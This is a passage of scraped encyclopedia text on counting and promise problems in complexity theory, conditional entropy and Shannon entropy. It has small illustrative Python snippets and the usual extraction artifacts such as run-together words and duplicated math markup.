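The contrast between a decision problem and its counting version can be illustrated with a small sketch. For brevity it uses subset-sum rather than the #CYCLE example above (a substitution made only for this illustration): the decision version returns a yes/no answer, while the counting version returns a number.

```python
from itertools import combinations

def exists_subset_with_sum(numbers, target):
    """Decision version: is there at least one subset summing to target?"""
    return any(sum(c) == target
               for r in range(len(numbers) + 1)
               for c in combinations(numbers, r))

def count_subsets_with_sum(numbers, target):
    """Counting version: how many subsets sum to target?  The output is a number."""
    return sum(1
               for r in range(len(numbers) + 1)
               for c in combinations(numbers, r)
               if sum(c) == target)

if __name__ == "__main__":
    nums, t = [1, 2, 3, 4, 5], 5
    print(exists_subset_with_sum(nums, t))   # True  (yes/no answer)
    print(count_subsets_with_sum(nums, t))   # 3     ({5}, {1,4}, {2,3})
```

Both sketches above enumerate every subset and so take exponential time; the point is only the difference in what they output, which is formalized next.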
Counting problems arise in a number of fields, includingstatistical estimation,statistical physics,network design, andeconomics.[21] #P(pronounced "sharp P") is an important class of counting problems that can be thought of as the counting version ofNP.[22]The connection toNParises from the fact that the number of solutions to a problem equals the number of accepting branches in anondeterministic Turing machine's computation tree.#Pis thus formally defined as follows: And just asNPcan be defined both in terms of nondeterminism and in terms of a verifier (i.e. as aninteractive proof system), so too can#Pbe equivalently defined in terms of a verifier. Recall that a decision problem is inNPif there exists a polynomial-time checkablecertificateto a given problem instance—that is,NPasks whether there exists a proof of membership (a certificate) for the input that can be checked for correctness in polynomial time. The class#Paskshow manysuch certificates exist.[22]In this context,#Pis defined as follows: Counting problems are a subset of a broader class of problems calledfunction problems. A function problem is a type of problem in which the values of afunctionf:A→B{\displaystyle f:A\to B}are computed. Formally, a function problemf{\displaystyle f}is defined as a relationR{\displaystyle R}over strings of an arbitraryalphabetΣ{\displaystyle \Sigma }: An algorithm solvesf{\displaystyle f}if for every inputx{\displaystyle x}such that there exists ay{\displaystyle y}satisfying(x,y)∈R{\displaystyle (x,y)\in R}, the algorithm produces one suchy{\displaystyle y}. This is just another way of saying thatf{\displaystyle f}is afunctionand the algorithm solvesf(x){\displaystyle f(x)}for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}}. An important function complexity class isFP, the class of efficiently solvable functions.[23]More specifically,FPis the set of function problems that can be solved by adeterministic Turing machineinpolynomial time.[23]FPcan be thought of as the function problem equivalent ofP. Importantly,FPprovides some insight into both counting problems andPversusNP. If#P=FP, then the functions that determine the number of certificates for problems inNPare efficiently solvable. And since computing the number of certificates is at least as hard as determining whether a certificate exists, it must follow that if#P=FPthenP=NP(it is not known whether this holds in the reverse, i.e. whetherP=NPimplies#P=FP).[23] Just asFPis the function problem equivalent ofP,FNPis the function problem equivalent ofNP. Importantly,FP=FNPif and only ifP=NP.[24] Promise problemsare a generalization of decision problems in which the input to a problem is guaranteed ("promised") to be from a particular subset of all possible inputs. Recall that with a decision problemL⊆{0,1}∗{\displaystyle L\subseteq \{0,1\}^{*}}, an algorithmM{\displaystyle M}forL{\displaystyle L}must act (correctly) oneveryw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}}. A promise problem loosens the input requirement onM{\displaystyle M}by restricting the input to some subset of{0,1}∗{\displaystyle \{0,1\}^{*}}. Specifically, a promise problem is defined as a pair of non-intersecting sets(ΠACCEPT,ΠREJECT){\displaystyle (\Pi _{\text{ACCEPT}},\Pi _{\text{REJECT}})}, where:[25] The input to an algorithmM{\displaystyle M}for a promise problem(ΠACCEPT,ΠREJECT){\displaystyle (\Pi _{\text{ACCEPT}},\Pi _{\text{REJECT}})}is thusΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}, which is called thepromise. 
Strings inΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}are said tosatisfy the promise.[25]By definition,ΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}must be disjoint, i.e.ΠACCEPT∩ΠREJECT=∅{\displaystyle \Pi _{\text{ACCEPT}}\cap \Pi _{\text{REJECT}}=\emptyset }. Within this formulation, it can be seen that decision problems are just the subset of promise problems with the trivial promiseΠACCEPT∪ΠREJECT={0,1}∗{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}=\{0,1\}^{*}}. With decision problems it is thus simpler to define the problem as onlyΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}(withΠREJECT{\displaystyle \Pi _{\text{REJECT}}}implicitly being{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}), which throughout this page is denotedL{\displaystyle L}to emphasize thatΠACCEPT=L{\displaystyle \Pi _{\text{ACCEPT}}=L}is aformal language. Promise problems make for a more natural formulation of many computational problems. For instance, a computational problem could be something like "given aplanar graph, determine whether or not..."[26]This is often stated as a decision problem, where it is assumed that there is some translation schema that takeseverystrings∈{0,1}∗{\displaystyle s\in \{0,1\}^{*}}to a planar graph. However, it is more straightforward to define this as a promise problem in which the input is promised to be a planar graph. Promise problems provide an alternate definition for standard complexity classes of decision problems.P, for instance, can be defined as a promise problem:[27] Classes of decision problems—that is, classes of problems defined as formal languages—thus translate naturally to promise problems, where a languageL{\displaystyle L}in the class is simplyL=ΠACCEPT{\displaystyle L=\Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}is implicitly{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}. Formulating many basic complexity classes likePas promise problems provides little additional insight into their nature. However, there are some complexity classes for which formulating them as promise problems has been useful to computer scientists. Promise problems have, for instance, played a key role in the study ofSZK(statistical zero-knowledge).[28] The following table shows some of the classes of problems that are considered in complexity theory. If classXis a strictsubsetofY, thenXis shown belowYwith a dark line connecting them. IfXis a subset, but it is unknown whether they are equal sets, then the line is lighter and dotted. Technically, the breakdown into decidable and undecidable pertains more to the study ofcomputability theory, but is useful for putting the complexity classes in perspective.
https://en.wikipedia.org/wiki/Complexity_class#NP_and_co-NP
Ininformation theory, theconditional entropyquantifies the amount of information needed to describe the outcome of arandom variableY{\displaystyle Y}given that the value of another random variableX{\displaystyle X}is known. Here, information is measured inshannons,nats, orhartleys. Theentropy ofY{\displaystyle Y}conditioned onX{\displaystyle X}is written asH(Y|X){\displaystyle \mathrm {H} (Y|X)}. The conditional entropy ofY{\displaystyle Y}givenX{\displaystyle X}is defined asH(Y|X)=−∑x∈X,y∈Yp(x,y)log⁡p(x,y)p(x){\displaystyle \mathrm {H} (Y|X)=-\sum _{x\in {\mathcal {X}},y\in {\mathcal {Y}}}p(x,y)\log {\frac {p(x,y)}{p(x)}}}, whereX{\displaystyle {\mathcal {X}}}andY{\displaystyle {\mathcal {Y}}}denote thesupport setsofX{\displaystyle X}andY{\displaystyle Y}. Note:Here, the convention is that the expression0log⁡0{\displaystyle 0\log 0}should be treated as being equal to zero. This is becauselimθ→0+θlog⁡θ=0{\displaystyle \lim _{\theta \to 0^{+}}\theta \,\log \theta =0}.[1] Intuitively, notice that by definition ofexpected valueand ofconditional probability,H(Y|X){\displaystyle \displaystyle H(Y|X)}can be written asH(Y|X)=E[f(X,Y)]{\displaystyle H(Y|X)=\mathbb {E} [f(X,Y)]}, wheref{\displaystyle f}is defined asf(x,y):=−log⁡(p(x,y)p(x))=−log⁡(p(y|x)){\displaystyle \displaystyle f(x,y):=-\log \left({\frac {p(x,y)}{p(x)}}\right)=-\log(p(y|x))}. One can think off{\displaystyle \displaystyle f}as associating each pair(x,y){\displaystyle \displaystyle (x,y)}with a quantity measuring the information content of(Y=y){\displaystyle \displaystyle (Y=y)}given(X=x){\displaystyle \displaystyle (X=x)}. This quantity is directly related to the amount of information needed to describe the event(Y=y){\displaystyle \displaystyle (Y=y)}given(X=x){\displaystyle (X=x)}. Hence by computing the expected value off{\displaystyle \displaystyle f}over all pairs of values(x,y)∈X×Y{\displaystyle (x,y)\in {\mathcal {X}}\times {\mathcal {Y}}}, the conditional entropyH(Y|X){\displaystyle \displaystyle H(Y|X)}measures how much information, on average, is needed to describeY{\displaystyle Y}whenX{\displaystyle X}is known. LetH(Y|X=x){\displaystyle \mathrm {H} (Y|X=x)}be theentropyof the discrete random variableY{\displaystyle Y}conditioned on the discrete random variableX{\displaystyle X}taking a certain valuex{\displaystyle x}. Denote the support sets ofX{\displaystyle X}andY{\displaystyle Y}byX{\displaystyle {\mathcal {X}}}andY{\displaystyle {\mathcal {Y}}}. LetY{\displaystyle Y}haveprobability mass functionpY(y){\displaystyle p_{Y}{(y)}}. The unconditional entropy ofY{\displaystyle Y}is calculated asH(Y):=E[I⁡(Y)]{\displaystyle \mathrm {H} (Y):=\mathbb {E} [\operatorname {I} (Y)]}, i.e. whereI⁡(yi){\displaystyle \operatorname {I} (y_{i})}is theinformation contentof theoutcomeofY{\displaystyle Y}taking the valueyi{\displaystyle y_{i}}. The entropy ofY{\displaystyle Y}conditioned onX{\displaystyle X}taking the valuex{\displaystyle x}is defined by: Note thatH(Y|X){\displaystyle \mathrm {H} (Y|X)}is the result of averagingH(Y|X=x){\displaystyle \mathrm {H} (Y|X=x)}over all possible valuesx{\displaystyle x}thatX{\displaystyle X}may take. 
Also, if the above sum is taken over a sampley1,…,yn{\displaystyle y_{1},\dots ,y_{n}}, the expected valueEX[H(y1,…,yn∣X=x)]{\displaystyle E_{X}[\mathrm {H} (y_{1},\dots ,y_{n}\mid X=x)]}is known in some domains asequivocation.[2] Givendiscrete random variablesX{\displaystyle X}with imageX{\displaystyle {\mathcal {X}}}andY{\displaystyle Y}with imageY{\displaystyle {\mathcal {Y}}}, the conditional entropy ofY{\displaystyle Y}givenX{\displaystyle X}is defined as the weighted sum ofH(Y|X=x){\displaystyle \mathrm {H} (Y|X=x)}for each possible value ofx{\displaystyle x}, usingp(x){\displaystyle p(x)}as the weights:[3]: 15 Conversely,H(Y|X)=H(Y){\displaystyle \mathrm {H} (Y|X)=\mathrm {H} (Y)}if and only ifY{\displaystyle Y}andX{\displaystyle X}areindependent random variables. Assume that the combined system determined by two random variablesX{\displaystyle X}andY{\displaystyle Y}hasjoint entropyH(X,Y){\displaystyle \mathrm {H} (X,Y)}, that is, we needH(X,Y){\displaystyle \mathrm {H} (X,Y)}bits of information on average to describe its exact state. Now if we first learn the value ofX{\displaystyle X}, we have gainedH(X){\displaystyle \mathrm {H} (X)}bits of information. OnceX{\displaystyle X}is known, we only needH(X,Y)−H(X){\displaystyle \mathrm {H} (X,Y)-\mathrm {H} (X)}bits to describe the state of the whole system. This quantity is exactlyH(Y|X){\displaystyle \mathrm {H} (Y|X)}, which gives thechain ruleof conditional entropy: The chain rule follows from the above definition of conditional entropy: In general, a chain rule for multiple random variables holds: It has a similar form to thechain rulein probability theory, except that addition instead of multiplication is used. Bayes' rulefor conditional entropy states Proof.H(Y|X)=H(X,Y)−H(X){\displaystyle \mathrm {H} (Y|X)=\mathrm {H} (X,Y)-\mathrm {H} (X)}andH(X|Y)=H(Y,X)−H(Y){\displaystyle \mathrm {H} (X|Y)=\mathrm {H} (Y,X)-\mathrm {H} (Y)}. Symmetry entailsH(X,Y)=H(Y,X){\displaystyle \mathrm {H} (X,Y)=\mathrm {H} (Y,X)}. Subtracting the two equations implies Bayes' rule. IfY{\displaystyle Y}isconditionally independentofZ{\displaystyle Z}givenX{\displaystyle X}we have: For anyX{\displaystyle X}andY{\displaystyle Y}: whereI⁡(X;Y){\displaystyle \operatorname {I} (X;Y)}is themutual informationbetweenX{\displaystyle X}andY{\displaystyle Y}. For independentX{\displaystyle X}andY{\displaystyle Y}: Although the specific-conditional entropyH(X|Y=y){\displaystyle \mathrm {H} (X|Y=y)}can be either less or greater thanH(X){\displaystyle \mathrm {H} (X)}for a givenrandom variatey{\displaystyle y}ofY{\displaystyle Y},H(X|Y){\displaystyle \mathrm {H} (X|Y)}can never exceedH(X){\displaystyle \mathrm {H} (X)}. The above definition is for discrete random variables. The continuous version of discrete conditional entropy is calledconditional differential (or continuous) entropy. LetX{\displaystyle X}andY{\displaystyle Y}be continuous random variables with ajoint probability density functionf(x,y){\displaystyle f(x,y)}. The differential conditional entropyh(X|Y){\displaystyle h(X|Y)}is defined as[3]: 249 In contrast to the conditional entropy for discrete random variables, the conditional differential entropy may be negative. As in the discrete case there is a chain rule for differential entropy: Notice however that this rule may not be true if the involved differential entropies do not exist or are infinite. 
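For the discrete case, the chain rule discussed above can be checked numerically. The following self-contained Python sketch (the example joint distribution is an assumption made only for the illustration) computes H(X,Y), H(X), and H(Y|X) directly from a joint probability table and confirms that H(X,Y) = H(X) + H(Y|X).

```python
from math import log2

# p(x, y) for a small joint distribution (values chosen only for illustration)
joint = {(0, 0): 0.3, (0, 1): 0.2, (1, 0): 0.1, (1, 1): 0.4}

def H(dist):
    """Shannon entropy (in bits) of a distribution given as outcome -> probability."""
    return -sum(p * log2(p) for p in dist.values() if p > 0)

# marginal distribution p(x)
p_x = {}
for (x, _), p in joint.items():
    p_x[x] = p_x.get(x, 0.0) + p

h_xy = H(joint)                                      # joint entropy H(X,Y)
h_x = H(p_x)                                         # marginal entropy H(X)
h_y_given_x = -sum(p * log2(p / p_x[x])              # conditional entropy H(Y|X)
                   for (x, _), p in joint.items() if p > 0)

print(round(h_xy, 6))                    # H(X,Y)
print(round(h_x + h_y_given_x, 6))       # H(X) + H(Y|X): the same value
```

The two printed values agree to floating-point precision, mirroring the intuitive argument above that learning X first leaves exactly H(X,Y) − H(X) bits of uncertainty about the pair.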
Joint differential entropy is also used in the definition of themutual informationbetween continuous random variables: The conditional differential entropy yields a lower bound on the expected squared error of anestimator. For any Gaussian random variableX{\displaystyle X}, observationY{\displaystyle Y}and estimatorX^{\displaystyle {\widehat {X}}}the following holds:[3]: 255 This is related to theuncertainty principlefromquantum mechanics. Inquantum information theory, the conditional entropy is generalized to theconditional quantum entropy. The latter can take negative values, unlike its classical counterpart.
https://en.wikipedia.org/wiki/Conditional_entropy
Ininformation theory, theentropyof arandom variablequantifies the average level of uncertainty or information associated with the variable's potential states or possible outcomes. This measures the expected amount of information needed to describe the state of the variable, considering the distribution of probabilities across all potential states. Given a discrete random variableX{\displaystyle X}, which may be any memberx{\displaystyle x}within the setX{\displaystyle {\mathcal {X}}}and is distributed according top:X→[0,1]{\displaystyle p\colon {\mathcal {X}}\to [0,1]}, the entropy isH(X):=−∑x∈Xp(x)log⁡p(x),{\displaystyle \mathrm {H} (X):=-\sum _{x\in {\mathcal {X}}}p(x)\log p(x),}whereΣ{\displaystyle \Sigma }denotes the sum over the variable's possible values.[Note 1]The choice of base forlog{\displaystyle \log }, thelogarithm, varies for different applications. Base 2 gives the unit ofbits(or "shannons"), while baseegives "natural units"nat, and base 10 gives units of "dits", "bans", or "hartleys". An equivalent definition of entropy is theexpected valueof theself-informationof a variable.[1] The concept of information entropy was introduced byClaude Shannonin his 1948 paper "A Mathematical Theory of Communication",[2][3]and is also referred to asShannon entropy. Shannon's theory defines adata communicationsystem composed of three elements: a source of data, acommunication channel, and a receiver. The "fundamental problem of communication" – as expressed by Shannon – is for the receiver to be able to identify what data was generated by the source, based on the signal it receives through the channel.[2][3]Shannon considered various ways to encode, compress, and transmit messages from a data source, and proved in hissource coding theoremthat the entropy represents an absolute mathematical limit on how well data from the source can belosslesslycompressed onto a perfectly noiseless channel. Shannon strengthened this result considerably for noisy channels in hisnoisy-channel coding theorem. Entropy in information theory is directly analogous to theentropyinstatistical thermodynamics. The analogy results when the values of the random variable designate energies of microstates, so Gibbs's formula for the entropy is formally identical to Shannon's formula. Entropy has relevance to other areas of mathematics such ascombinatoricsandmachine learning. The definition can be derived from a set ofaxiomsestablishing that entropy should be a measure of how informative the average outcome of a variable is. For a continuous random variable,differential entropyis analogous to entropy. The definitionE[−log⁡p(X)]{\displaystyle \mathbb {E} [-\log p(X)]}generalizes the above. The core idea of information theory is that the "informational value" of a communicated message depends on the degree to which the content of the message is surprising. If a highly likely event occurs, the message carries very little information. On the other hand, if a highly unlikely event occurs, the message is much more informative. For instance, the knowledge that some particular numberwill notbe the winning number of a lottery provides very little information, because any particular chosen number will almost certainly not win. However, knowledge that a particular numberwillwin a lottery has high informational value because it communicates the occurrence of a very low probability event. 
Theinformation content,also called thesurprisalorself-information,of an eventE{\displaystyle E}is a function that increases as the probabilityp(E){\displaystyle p(E)}of an event decreases. Whenp(E){\displaystyle p(E)}is close to 1, the surprisal of the event is low, but ifp(E){\displaystyle p(E)}is close to 0, the surprisal of the event is high. This relationship is described by the functionlog⁡(1p(E)),{\displaystyle \log \left({\frac {1}{p(E)}}\right),}wherelog{\displaystyle \log }is thelogarithm, which gives 0 surprise when the probability of the event is 1.[4]In fact,logis the only function that satisfies а specific set of conditions defined in section§ Characterization. Hence, we can define the information, or surprisal, of an eventE{\displaystyle E}byI(E)=−log⁡(p(E)),{\displaystyle I(E)=-\log(p(E)),}or equivalently,I(E)=log⁡(1p(E)).{\displaystyle I(E)=\log \left({\frac {1}{p(E)}}\right).} Entropy measures the expected (i.e., average) amount of information conveyed by identifying the outcome of a random trial.[5]: 67This implies that rolling a die has higher entropy than tossing a coin because each outcome of a die toss has smaller probability (p=1/6{\displaystyle p=1/6}) than each outcome of a coin toss (p=1/2{\displaystyle p=1/2}). Consider a coin with probabilitypof landing on heads and probability1 −pof landing on tails. The maximum surprise is whenp= 1/2, for which one outcome is not expected over the other. In this case a coin flip has an entropy of onebit(similarly, onetritwith equiprobable values containslog2⁡3{\displaystyle \log _{2}3}(about 1.58496) bits of information because it can have one of three values). The minimum surprise is whenp= 0(impossibility) orp= 1(certainty) and the entropy is zero bits. When the entropy is zero, sometimes referred to as unity[Note 2], there is no uncertainty at all – no freedom of choice – noinformation.[6]Other values ofpgive entropies between zero and one bits. Information theory is useful to calculate the smallest amount of information required to convey a message, as indata compression. For example, consider the transmission of sequences comprising the 4 characters 'A', 'B', 'C', and 'D' over a binary channel. If all 4 letters are equally likely (25%), one cannot do better than using two bits to encode each letter. 'A' might code as '00', 'B' as '01', 'C' as '10', and 'D' as '11'. However, if the probabilities of each letter are unequal, say 'A' occurs with 70% probability, 'B' with 26%, and 'C' and 'D' with 2% each, one could assign variable length codes. In this case, 'A' would be coded as '0', 'B' as '10', 'C' as '110', and 'D' as '111'. With this representation, 70% of the time only one bit needs to be sent, 26% of the time two bits, and only 4% of the time 3 bits. On average, fewer than 2 bits are required since the entropy is lower (owing to the high prevalence of 'A' followed by 'B' – together 96% of characters). The calculation of the sum of probability-weighted log probabilities measures and captures this effect. English text, treated as a string of characters, has fairly low entropy; i.e. it is fairly predictable. We can be fairly certain that, for example, 'e' will be far more common than 'z', that the combination 'qu' will be much more common than any other combination with a 'q' in it, and that the combination 'th' will be more common than 'z', 'q', or 'qu'. After the first few letters one can often guess the rest of the word. 
English text has between 0.6 and 1.3 bits of entropy per character of the message.[7]: 234 Named afterBoltzmann's Η-theorem, Shannon defined the entropyΗ(Greek capital lettereta) of adiscrete random variableX{\textstyle X}, which takes values in the setX{\displaystyle {\mathcal {X}}}and is distributed according top:X→[0,1]{\displaystyle p:{\mathcal {X}}\to [0,1]}such thatp(x):=P[X=x]{\displaystyle p(x):=\mathbb {P} [X=x]}: H(X)=E[I⁡(X)]=E[−log⁡p(X)].{\displaystyle \mathrm {H} (X)=\mathbb {E} [\operatorname {I} (X)]=\mathbb {E} [-\log p(X)].} HereE{\displaystyle \mathbb {E} }is theexpected value operator, andIis theinformation contentofX.[8]: 11[9]: 19–20I⁡(X){\displaystyle \operatorname {I} (X)}is itself a random variable. The entropy can explicitly be written as:H(X)=−∑x∈Xp(x)logb⁡p(x),{\displaystyle \mathrm {H} (X)=-\sum _{x\in {\mathcal {X}}}p(x)\log _{b}p(x),}wherebis thebase of the logarithmused. Common values ofbare 2,Euler's numbere, and 10, and the corresponding units of entropy are thebitsforb= 2,natsforb=e, andbansforb= 10.[10] In the case ofp(x)=0{\displaystyle p(x)=0}for somex∈X{\displaystyle x\in {\mathcal {X}}}, the value of the corresponding summand0 logb(0)is taken to be0, which is consistent with thelimit:[11]: 13limp→0+plog⁡(p)=0.{\displaystyle \lim _{p\to 0^{+}}p\log(p)=0.} One may also define theconditional entropyof two variablesX{\displaystyle X}andY{\displaystyle Y}taking values from setsX{\displaystyle {\mathcal {X}}}andY{\displaystyle {\mathcal {Y}}}respectively, as:[11]: 16H(X|Y)=−∑x,y∈X×YpX,Y(x,y)log⁡pX,Y(x,y)pY(y),{\displaystyle \mathrm {H} (X|Y)=-\sum _{x,y\in {\mathcal {X}}\times {\mathcal {Y}}}p_{X,Y}(x,y)\log {\frac {p_{X,Y}(x,y)}{p_{Y}(y)}},}wherepX,Y(x,y):=P[X=x,Y=y]{\displaystyle p_{X,Y}(x,y):=\mathbb {P} [X=x,Y=y]}andpY(y)=P[Y=y]{\displaystyle p_{Y}(y)=\mathbb {P} [Y=y]}. This quantity should be understood as the remaining randomness in the random variableX{\displaystyle X}given the random variableY{\displaystyle Y}. Entropy can be formally defined in the language ofmeasure theoryas follows:[12]Let(X,Σ,μ){\displaystyle (X,\Sigma ,\mu )}be aprobability space. LetA∈Σ{\displaystyle A\in \Sigma }be anevent. ThesurprisalofA{\displaystyle A}isσμ(A)=−ln⁡μ(A).{\displaystyle \sigma _{\mu }(A)=-\ln \mu (A).} Theexpectedsurprisal ofA{\displaystyle A}ishμ(A)=μ(A)σμ(A).{\displaystyle h_{\mu }(A)=\mu (A)\sigma _{\mu }(A).} Aμ{\displaystyle \mu }-almostpartitionis aset familyP⊆P(X){\displaystyle P\subseteq {\mathcal {P}}(X)}such thatμ(∪⁡P)=1{\displaystyle \mu (\mathop {\cup } P)=1}andμ(A∩B)=0{\displaystyle \mu (A\cap B)=0}for all distinctA,B∈P{\displaystyle A,B\in P}. (This is a relaxation of the usual conditions for a partition.) The entropy ofP{\displaystyle P}isHμ(P)=∑A∈Phμ(A).{\displaystyle \mathrm {H} _{\mu }(P)=\sum _{A\in P}h_{\mu }(A).} LetM{\displaystyle M}be asigma-algebraonX{\displaystyle X}. The entropy ofM{\displaystyle M}isHμ(M)=supP⊆MHμ(P).{\displaystyle \mathrm {H} _{\mu }(M)=\sup _{P\subseteq M}\mathrm {H} _{\mu }(P).}Finally, the entropy of the probability space isHμ(Σ){\displaystyle \mathrm {H} _{\mu }(\Sigma )}, that is, the entropy with respect toμ{\displaystyle \mu }of the sigma-algebra ofallmeasurable subsets ofX{\displaystyle X}. 
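The explicit formula above can be applied directly. The short Python sketch below is only an illustration: it reuses the 'A'/'B'/'C'/'D' distribution and the variable-length code from the earlier coding example, computes the entropy in bits, nats, and bans by changing the base b, and compares the result with the average code length.

```python
from math import log, e

probs = {"A": 0.70, "B": 0.26, "C": 0.02, "D": 0.02}   # distribution from the earlier example
code  = {"A": "0", "B": "10", "C": "110", "D": "111"}  # variable-length code from that example

def entropy(dist, b=2):
    """Shannon entropy of a distribution given as symbol -> probability, in base b."""
    return -sum(p * log(p, b) for p in dist.values() if p > 0)

avg_code_length = sum(probs[s] * len(code[s]) for s in probs)

print(round(entropy(probs, 2), 3))    # ~1.091 bits   (b = 2)
print(round(entropy(probs, e), 3))    # ~0.756 nats   (b = e)
print(round(entropy(probs, 10), 3))   # ~0.328 bans   (b = 10)
print(round(avg_code_length, 2))      # 1.34 bits per symbol, above the ~1.091-bit entropy limit
```

The three entropy values are constant multiples of one another, differing only in the choice of unit, and the average code length of 1.34 bits per symbol sits between the entropy (the compression limit) and the 2 bits per symbol of a fixed-length code.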
Recent studies on layered dynamical systems have introduced the concept of symbolic conditional entropy, further extending classical entropy measures to more abstract informational structures.[13] Consider tossing a coin with known, not necessarily fair, probabilities of coming up heads or tails; this can be modeled as aBernoulli process. The entropy of the unknown result of the next toss of the coin is maximized if the coin is fair (that is, if heads and tails both have equal probability 1/2). This is the situation of maximum uncertainty as it is most difficult to predict the outcome of the next toss; the result of each toss of the coin delivers one full bit of information. This is becauseH(X)=−∑i=1np(xi)logb⁡p(xi)=−∑i=1212log2⁡12=−∑i=1212⋅(−1)=1.{\displaystyle {\begin{aligned}\mathrm {H} (X)&=-\sum _{i=1}^{n}{p(x_{i})\log _{b}p(x_{i})}\\&=-\sum _{i=1}^{2}{{\frac {1}{2}}\log _{2}{\frac {1}{2}}}\\&=-\sum _{i=1}^{2}{{\frac {1}{2}}\cdot (-1)}=1.\end{aligned}}} However, if we know the coin is not fair, but comes up heads or tails with probabilitiespandq, wherep≠q, then there is less uncertainty. Every time it is tossed, one side is more likely to come up than the other. The reduced uncertainty is quantified in a lower entropy: on average each toss of the coin delivers less than one full bit of information. For example, ifp= 0.7, thenH(X)=−plog2⁡p−qlog2⁡q=−0.7log2⁡(0.7)−0.3log2⁡(0.3)≈−0.7⋅(−0.515)−0.3⋅(−1.737)=0.8816<1.{\displaystyle {\begin{aligned}\mathrm {H} (X)&=-p\log _{2}p-q\log _{2}q\\[1ex]&=-0.7\log _{2}(0.7)-0.3\log _{2}(0.3)\\[1ex]&\approx -0.7\cdot (-0.515)-0.3\cdot (-1.737)\\[1ex]&=0.8816<1.\end{aligned}}} Uniform probability yields maximum uncertainty and therefore maximum entropy. Entropy, then, can only decrease from the value associated with uniform probability. The extreme case is that of a double-headed coin that never comes up tails, or a double-tailed coin that never results in a head. Then there is no uncertainty. The entropy is zero: each toss of the coin delivers no new information as the outcome of each coin toss is always certain.[11]: 14–15 To understand the meaning of−Σpilog(pi), first define an information functionIin terms of an eventiwith probabilitypi. The amount of information acquired due to the observation of eventifollows from Shannon's solution of the fundamental properties ofinformation:[14] Given two independent events, if the first event can yield one ofnequiprobableoutcomes and another has one ofmequiprobable outcomes then there aremnequiprobable outcomes of the joint event. This means that iflog2(n)bits are needed to encode the first value andlog2(m)to encode the second, one needslog2(mn) = log2(m) + log2(n)to encode both. Shannon discovered that a suitable choice ofI{\displaystyle \operatorname {I} }is given by:[15]I⁡(p)=log⁡(1p)=−log⁡(p).{\displaystyle \operatorname {I} (p)=\log \left({\tfrac {1}{p}}\right)=-\log(p).} In fact, the only possible values ofI{\displaystyle \operatorname {I} }areI⁡(u)=klog⁡u{\displaystyle \operatorname {I} (u)=k\log u}fork<0{\displaystyle k<0}. Additionally, choosing a value forkis equivalent to choosing a valuex>1{\displaystyle x>1}fork=−1/log⁡x{\displaystyle k=-1/\log x}, so thatxcorresponds to thebase for the logarithm. Thus, entropy ischaracterizedby the above four properties. 
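The biased-coin discussion above reduces to the binary entropy function; a short Python check (illustrative only) reproduces the values quoted above, up to the rounding of the intermediate logarithms.

```python
import math

def binary_entropy(p):
    """Entropy (in bits) of a coin that lands heads with probability p."""
    if p in (0.0, 1.0):
        return 0.0           # certainty: the outcome carries no information
    q = 1.0 - p
    return -p * math.log2(p) - q * math.log2(q)

print(binary_entropy(0.5))   # 1.0      -- maximum uncertainty, one full bit
print(binary_entropy(0.7))   # ~0.8813  -- the text's 0.8816 uses rounded logs
print(binary_entropy(1.0))   # 0.0      -- double-headed coin, no uncertainty
```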
I⁡(p1p2)=I⁡(p1)+I⁡(p2)Starting from property 3p2I′⁡(p1p2)=I′⁡(p1)taking the derivative w.r.tp1I′⁡(p1p2)+p1p2I″⁡(p1p2)=0taking the derivative w.r.tp2I′⁡(u)+uI″⁡(u)=0introducingu=p1p2(uI′⁡(u))′=0combining terms into oneuI′⁡(u)−k=0integrating w.r.tu,producing constantk{\displaystyle {\begin{aligned}&\operatorname {I} (p_{1}p_{2})&=\ &\operatorname {I} (p_{1})+\operatorname {I} (p_{2})&&\quad {\text{Starting from property 3}}\\&p_{2}\operatorname {I} '(p_{1}p_{2})&=\ &\operatorname {I} '(p_{1})&&\quad {\text{taking the derivative w.r.t}}\ p_{1}\\&\operatorname {I} '(p_{1}p_{2})+p_{1}p_{2}\operatorname {I} ''(p_{1}p_{2})&=\ &0&&\quad {\text{taking the derivative w.r.t}}\ p_{2}\\&\operatorname {I} '(u)+u\operatorname {I} ''(u)&=\ &0&&\quad {\text{introducing}}\,u=p_{1}p_{2}\\&(u\operatorname {I} '(u))'&=\ &0&&\quad {\text{combining terms into one}}\ \\&u\operatorname {I} '(u)-k&=\ &0&&\quad {\text{integrating w.r.t}}\ u,{\text{producing constant}}\,k\\\end{aligned}}} Thisdifferential equationleads to the solutionI⁡(u)=klog⁡u+c{\displaystyle \operatorname {I} (u)=k\log u+c}for somek,c∈R{\displaystyle k,c\in \mathbb {R} }. Property 2 givesc=0{\displaystyle c=0}. Property 1 and 2 give thatI⁡(p)≥0{\displaystyle \operatorname {I} (p)\geq 0}for allp∈[0,1]{\displaystyle p\in [0,1]}, so thatk<0{\displaystyle k<0}. The differentunits of information(bitsfor thebinary logarithmlog2,natsfor thenatural logarithmln,bansfor thedecimal logarithmlog10and so on) areconstant multiplesof each other. For instance, in case of a fair coin toss, heads provideslog2(2) = 1bit of information, which is approximately 0.693 nats or 0.301 decimal digits. Because of additivity,ntosses providenbits of information, which is approximately0.693nnats or0.301ndecimal digits. Themeaningof the events observed (the meaning ofmessages) does not matter in the definition of entropy. Entropy only takes into account the probability of observing a specific event, so the information it encapsulates is information about the underlyingprobability distribution, not the meaning of the events themselves. Another characterization of entropy uses the following properties. We denotepi= Pr(X=xi)andΗn(p1, ...,pn) = Η(X). The rule of additivity has the following consequences: forpositive integersbiwhereb1+ ... +bk=n,Hn(1n,…,1n)=Hk(b1n,…,bkn)+∑i=1kbinHbi(1bi,…,1bi).{\displaystyle \mathrm {H} _{n}\left({\frac {1}{n}},\ldots ,{\frac {1}{n}}\right)=\mathrm {H} _{k}\left({\frac {b_{1}}{n}},\ldots ,{\frac {b_{k}}{n}}\right)+\sum _{i=1}^{k}{\frac {b_{i}}{n}}\,\mathrm {H} 